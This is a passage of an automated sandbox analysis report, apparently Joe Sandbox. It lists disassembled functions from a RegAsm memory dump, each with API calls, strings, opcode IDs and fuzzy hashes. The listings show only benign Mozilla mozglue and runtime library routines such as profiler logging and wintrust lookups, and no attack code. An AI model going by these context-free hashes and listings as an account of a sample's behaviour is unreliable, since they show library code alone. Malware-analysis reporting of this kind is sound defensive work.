                                                                              • Part of subcall function 6CC8CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6CCAB5EB,00000000), ref: 6CC8CB12
                                                                            • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6CC8C863
                                                                            • std::_Facet_Register.LIBCPMT ref: 6CC8C875
                                                                              • Part of subcall function 6CC6B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6CCAB636,?), ref: 6CC6B143
                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CC8C89A
                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC8C8BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                            • String ID:
                                                                            • API String ID: 2745304114-0
                                                                            • Opcode ID: ad86ec264a5a47fda1b31331219832c27f8e8dad6352cba228b64b06a68c3f5c
                                                                            • Instruction ID: d6efabef8bd65adb6721dbe20feece3e57f601e32d838ee83afd082c42a582f2
                                                                            • Opcode Fuzzy Hash: ad86ec264a5a47fda1b31331219832c27f8e8dad6352cba228b64b06a68c3f5c
                                                                            • Instruction Fuzzy Hash: E911B275B002099FCB00DFF5D9D98AFBB78EF89358B000169E60697341EB34A909CBA5
                                                                            Function 6CC6D5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CC3EB57,?,?,?,?,?,?,?,?,?), ref: 6CC6D652
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CC3EB57,?), ref: 6CC6D660
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CC3EB57,?), ref: 6CC6D673
                                                                            • free.MOZGLUE(?), ref: 6CC6D888
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$memsetmoz_xmalloc
                                                                            • String ID: |Enabled
                                                                            • API String ID: 4142949111-2633303760
                                                                            • Opcode ID: 5769ecde866987215c214312e5b3e8740b2931b25560c7db08aaaf9a0546d1f5
                                                                            • Instruction ID: d2b9d6e82247c08b8cd15cf5a8286e2bed2ad11bdee209f9620e142a0e38bca8
                                                                            • Opcode Fuzzy Hash: 5769ecde866987215c214312e5b3e8740b2931b25560c7db08aaaf9a0546d1f5
                                                                            • Instruction Fuzzy Hash: F8A118B4A003158FDB11CF6AC5D07AEBBF1AF49318F24845CD889ABB41E735E945CBA1
                                                                            Function 6CC80180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • free.MOZGLUE(?), ref: 6CC80270
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC802E9
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC802F6
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC8033A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                            • String ID: about:blank
                                                                            • API String ID: 2047719359-258612819
                                                                            • Opcode ID: 57ca350a799d56cb7c62ea457a8b9f58af2f19e4448bb172f4a91c248fec11fe
                                                                            • Instruction ID: 108be197c94cc5678d92bb1cf6afe7933a7f2e413cd484210144cb59b4a979f8
                                                                            • Opcode Fuzzy Hash: 57ca350a799d56cb7c62ea457a8b9f58af2f19e4448bb172f4a91c248fec11fe
                                                                            • Instruction Fuzzy Hash: 0E51B179A022198FCB00DF98C48099AFBF1FF49328F644559D81AA7B41E731BC45CFA4
                                                                            Function 6CC7E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7E12F
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6CC7E084,00000000), ref: 6CC7E137
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6CC7E196
                                                                            • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6CC7E1E9
                                                                              • Part of subcall function 6CC799A0: GetCurrentThreadId.KERNEL32 ref: 6CC799C1
                                                                              • Part of subcall function 6CC799A0: AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC799CE
                                                                              • Part of subcall function 6CC799A0: ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC799F8
                                                                            Strings
                                                                            • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6CC7E13F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                            • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                            • API String ID: 2491745604-3904374701
                                                                            • Opcode ID: 3d582ef41a8d17a1c25dbab890a67450393b63b968459fa1d7bb173b04860e59
                                                                            • Instruction ID: 9b5a9714f861609d0d22e8c0589c4fcfccc6c16457f8571a6d1f25ae1413cdb6
                                                                            • Opcode Fuzzy Hash: 3d582ef41a8d17a1c25dbab890a67450393b63b968459fa1d7bb173b04860e59
                                                                            • Instruction Fuzzy Hash: 3831F6B16047019FD7049FA884553AAF7E5EFC6348F14C42EE8598BB41FB708909C7A2
                                                                            Function 6CC6F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CC6F480
                                                                              • Part of subcall function 6CC3F100: LoadLibraryW.KERNEL32(shell32,?,6CCAD020), ref: 6CC3F122
                                                                              • Part of subcall function 6CC3F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC3F132
                                                                            • CloseHandle.KERNEL32(00000000), ref: 6CC6F555
                                                                              • Part of subcall function 6CC414B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CC41248,6CC41248,?), ref: 6CC414C9
                                                                              • Part of subcall function 6CC414B0: memcpy.VCRUNTIME140(?,6CC41248,00000000,?,6CC41248,?), ref: 6CC414EF
                                                                              • Part of subcall function 6CC3EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CC3EEE3
                                                                            • CreateFileW.KERNEL32 ref: 6CC6F4FD
                                                                            • GetFileInformationByHandle.KERNEL32(00000000), ref: 6CC6F523
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                            • String ID: \oleacc.dll
                                                                            • API String ID: 2595878907-3839883404
                                                                            • Opcode ID: 8db3ade2e76c7dc684c618afdf0cd0c96942311eb06c539bcc35637ec44ddafe
                                                                            • Instruction ID: bf251850898c74005623de6b00750e3827e99eb0af08c6eede5676e93464d8a8
                                                                            • Opcode Fuzzy Hash: 8db3ade2e76c7dc684c618afdf0cd0c96942311eb06c539bcc35637ec44ddafe
                                                                            • Instruction Fuzzy Hash: 4D41AE306087509FE720DF6AD984B9AB7F4AF44318F504A1CF59483A50FB30D9498BA2
                                                                            Function 6CC70210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC70222
                                                                            • moz_xmalloc.MOZGLUE(0000000C), ref: 6CC70231
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC7028B
                                                                            • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6CC702F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
                                                                            • String ID: @
                                                                            • API String ID: 2782572024-2766056989
                                                                            • Opcode ID: 45710384878d39979fdc52a64af5d7ac0d1aa5e4d5096c9c2ab3d3076eba2169
                                                                            • Instruction ID: d438f2e1e138f83d23b1953e8fb043d95264a886524b7df945bf14d2706c3efe
                                                                            • Opcode Fuzzy Hash: 45710384878d39979fdc52a64af5d7ac0d1aa5e4d5096c9c2ab3d3076eba2169
                                                                            • Instruction Fuzzy Hash: 5831AEB2B006518FEB64CF59C880A1AB7F2FF44314B14852DD95ADBB81E772EC01CBA1
                                                                            Function 6CC7E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7E047
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7E04F
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7E09C
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7E0B0
                                                                            Strings
                                                                            • [I %d/%d] profiler_get_profile, xrefs: 6CC7E057
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                            • String ID: [I %d/%d] profiler_get_profile
                                                                            • API String ID: 1832963901-4276087706
                                                                            • Opcode ID: 58b5ac3eae2e30694661e5a8e7a6306bf5a6c5b3be46caf3ccc8d26de38ca540
                                                                            • Instruction ID: 4cc4da9b46a90729d47ce00b5c7ea4e919039f75f84e0613efacdd09bfa4aab1
                                                                            • Opcode Fuzzy Hash: 58b5ac3eae2e30694661e5a8e7a6306bf5a6c5b3be46caf3ccc8d26de38ca540
                                                                            • Instruction Fuzzy Hash: F421C275B001088FDF10DFA4D85CAEEB7B5EF45208F144029E90A97741EB31A90AC7F1
                                                                            Function 6CC974A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetLastError.KERNEL32(00000000), ref: 6CC97526
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC97566
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC97597
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer$ErrorLast
                                                                            • String ID: UnmapViewOfFile2$kernel32.dll
                                                                            • API String ID: 3217676052-1401603581
                                                                            • Opcode ID: 5732aacc14c51ebfd25fcc35d4a704cd0e2e80190042ab8bc60d20784d5fac73
                                                                            • Instruction ID: bcaae2a58e4037b62c7f0040e3b9ac632e3111d96814dac22b187094dc224c5d
                                                                            • Opcode Fuzzy Hash: 5732aacc14c51ebfd25fcc35d4a704cd0e2e80190042ab8bc60d20784d5fac73
                                                                            • Instruction Fuzzy Hash: 0D210739702501AFCA148FEAC854E9A3375EB87728F1445A8E405A7F40FB31A8428B99
                                                                            Function 6CC9A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBF770,-00000001,?,6CCAE330,?,6CC5BDF7), ref: 6CC9A7AF
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6CC5BDF7), ref: 6CC9A7C2
                                                                            • moz_xmalloc.MOZGLUE(00000018,?,6CC5BDF7), ref: 6CC9A7E4
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A80A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                            • String ID: accelerator.dll
                                                                            • API String ID: 2442272132-2426294810
                                                                            • Opcode ID: 278045426007937eac2b31c12e477f06b2d5e7015ad246891c16642f0c2d893b
                                                                            • Instruction ID: 35150c22d8cf806bb711a509f456227c69f05d7e3148b6fe928cb720fcb5e5f9
                                                                            • Opcode Fuzzy Hash: 278045426007937eac2b31c12e477f06b2d5e7015ad246891c16642f0c2d893b
                                                                            • Instruction Fuzzy Hash: 7D01A2786003049FDB04CFDAD8C9D5577F8FF8931470480AAE8099B751EB70A800CBA0
                                                                            Function 6CC3F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(ole32,?,6CC3EE51,?), ref: 6CC3F0B2
                                                                            • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6CC3F0C2
                                                                            Strings
                                                                            • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6CC3F0DC
                                                                            • ole32, xrefs: 6CC3F0AD
                                                                            • Could not find CoTaskMemFree, xrefs: 6CC3F0E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                            • API String ID: 2574300362-1578401391
                                                                            • Opcode ID: 41826c5b977149d6489d6105696a1c712016a9be2c042c93e12641924b234564
                                                                            • Instruction ID: e8e21632cc7565b75f804de515cb8be09199a1895e5bb69d036ee744cc87cbcf
                                                                            • Opcode Fuzzy Hash: 41826c5b977149d6489d6105696a1c712016a9be2c042c93e12641924b234564
                                                                            • Instruction Fuzzy Hash: A7E0D8B47446029F9F041AFEA858A2637BC6B121093005829F906E1F10FA34D4018626
                                                                            Function 6CC700D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47235), ref: 6CC700D8
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6CC700F7
                                                                            • FreeLibrary.KERNEL32(?,6CC47235), ref: 6CC7010E
                                                                            Strings
                                                                            • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6CC700F1
                                                                            • wintrust.dll, xrefs: 6CC700D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                            • API String ID: 145871493-2559046807
                                                                            • Opcode ID: eac06c0a08ef49c4804ec8c792a34dd699696796f47c5b2840101911fece71cb
                                                                            • Instruction ID: d8a69529154ecd6d3b4706dc8602c4e06d9a4f8a0524c8609cc9cbf440ee710a
                                                                            • Opcode Fuzzy Hash: eac06c0a08ef49c4804ec8c792a34dd699696796f47c5b2840101911fece71cb
                                                                            • Instruction Fuzzy Hash: 96E0467C7453869FEF109FE5C9497223AF8E707244F109025A90EC1B50EBB2C000DB28
                                                                            Function 6CC70080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47204), ref: 6CC70088
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6CC700A7
                                                                            • FreeLibrary.KERNEL32(?,6CC47204), ref: 6CC700BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                            • API String ID: 145871493-3385133079
                                                                            • Opcode ID: 2629ab1c8b645b495e8f9e6138e926cfa5fee034f7433bc796ee29314912e33d
                                                                            • Instruction ID: 36010a133204443830826247e9e8a93c4db88e3cd2d05fee2d32fc5c3da5c18e
                                                                            • Opcode Fuzzy Hash: 2629ab1c8b645b495e8f9e6138e926cfa5fee034f7433bc796ee29314912e33d
                                                                            • Instruction Fuzzy Hash: F4E0927C6443859FEF20AFFAD8587027AF8AB1B355F10401AA915D2760EBB6C4009B2A
                                                                            Function 6CC701C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47266), ref: 6CC701C8
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6CC701E7
                                                                            • FreeLibrary.KERNEL32(?,6CC47266), ref: 6CC701FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                                            • API String ID: 145871493-1489773717
                                                                            • Opcode ID: 459fb640ea98efd967dc6177afb98ff0ac7e5195dc288a9eb85922e8790f1ff8
                                                                            • Instruction ID: 6c813ce744cfe635db1875e1d0f3fc86617c0e96149d89f530fa0445e30a4906
                                                                            • Opcode Fuzzy Hash: 459fb640ea98efd967dc6177afb98ff0ac7e5195dc288a9eb85922e8790f1ff8
                                                                            • Instruction Fuzzy Hash: 64E09A7C6853859FEF109FEAD8587027BF8EB07345F104419E905D5750EBB294009B29
                                                                            Function 6CC70170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47308), ref: 6CC70178
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6CC70197
                                                                            • FreeLibrary.KERNEL32(?,6CC47308), ref: 6CC701AE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
